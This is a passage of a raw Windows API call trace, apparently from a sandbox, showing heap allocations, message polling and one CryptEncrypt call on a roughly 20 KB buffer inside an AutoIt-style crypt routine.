Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.420] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0227.420] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.420] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0227.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0227.421] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.421] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.421] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0227.421] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.421] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.421] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.421] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.421] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.421] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.422] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.422] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.422] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0227.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0227.422] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x5116, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x5118) returned 1 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0227.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0227.423] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0227.423] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.424] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.424] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0227.425] CharLowerBuffW (in: lpsz="byte[20760]", cchLength=0xb | out: lpsz="byte[20760]") returned 0xb [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.425] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5118) returned 0x2f1ea58 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.426] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.426] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.427] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.427] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.427] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x2f23b78 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.428] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5116) returned 0x2f28c98 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f23b78 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0227.428] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28c98 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.429] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.429] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.429] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.429] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.429] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0227.430] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.430] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.432] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0227.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0227.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.433] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0227.434] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.434] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.434] RtlAllocateHeap 